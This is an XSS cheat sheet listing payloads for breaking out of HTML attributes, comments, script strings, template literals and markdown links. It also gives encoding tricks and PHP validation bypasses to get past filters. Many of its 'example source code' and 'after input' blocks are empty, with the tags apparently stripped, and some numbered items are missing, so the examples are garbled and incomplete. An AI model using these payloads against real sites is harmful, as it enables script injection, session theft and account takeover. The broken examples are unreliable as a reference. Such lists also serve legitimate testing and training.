# XSS Cheat Sheet (Basic) 1. Basic payload ```html ``` 2. Add ' or " to escape the payload from value of an HTML tag ```html "> '> ``` * Example source code ```html ``` * After input the payload ```html ``` 3. Add --> to escape the payload if input lands in HTML comments. ```html --> ``` * Example source code ```html ``` * After input the payload ```html --> ``` 4. Add when the input inside or between opening/closing tags, tag can be ```,, "> ``` * Example source code ```html 1 ``` * After input the payload ```html ">1 ``` 5. Use when input inside an attribute’s value of an HTML tag but > is filtered ```html " onmouseover=alert(1) " autofocus onfocus=alert(1) ``` * Example source code ```html ``` * After input the payload ```html ``` 6. Use when input inside ``` ``` * Example source code ```html ``` * After input the payload ```html '; ``` # XSS Cheat Sheet (Advanced) 7. Use when input lands in a script block, inside a string delimited value. ```html '-alert(1)-' '/alert(1)// ``` * Example source code ```html ``` * After input the payload ```html ``` 8. Same like Number 7. But inside a string delimited value but quotes are escaped by a backslash. ```html \'alert(1)// ``` * Example source code ```html ``` * If we input payload '-alert(1)-' it will be like this ```html ``` The quotes are escaped by a backslash so we need to bypass them * After input the payload ```html ``` 9. Use when there’s multi reflection in the same line of JS code ```html /alert(1)//\ /alert(1)}//\ ``` * Example source code ```html ``` * After input the payload ```html ``` 10. Use when input inside a string delimited value and inside a single logical block like function or conditional (if, else, etc). ```html '}alert(1);{' \'}alert(1);{// ``` * Example source code ```html ``` * After input the payload ```html ``` > Payload number 2 uses when quote escaped by backslash 11. Use when input lands inside backticks delimited strings ```html ${alert(1)} ``` * Example source code ```html ``` * After input the payload ```html ``` 12. Uses when there is multiple reflections on same page. (Double Reflection) ```html 'onload=alert(1)>alert(1)'>alert(1)/*' dapos.jpeg ``` 16. XSS with SVG file (File Upload) ``` ``` 17. XSS via markdown ``` [Click Me](javascript:alert('1')) ``` 18. XSS in XML page ``` alert(1) ``` > Add a "-->" to payload if input lands in a comment section > Add a "]]>" if input lands in a CDATA section # XSS Cheat Sheet (Bypass) 19. Mixed Case ```html ``` 20. Unclosed Tags ```html ``` 22. Encoded XSS ```html (Encoded) %3Csvg%20onload%3Dalert(1)%3E (Double Encoded) %253Csvg%2520onload%253Dalert%281%29%253E (Triple Encoded) %25253Csvg%252520onload%25253Dalert%25281%2529%25253E ``` 23. JS Lowercased Input ```html alert(1) ``` 24. PHP Email Validation Bypass ```html "@gmail.com ``` 25. PHP URL Validation Bypass ```html javascript://%250Aalert(1) ``` 26. Inside Comments Bypass ```html ```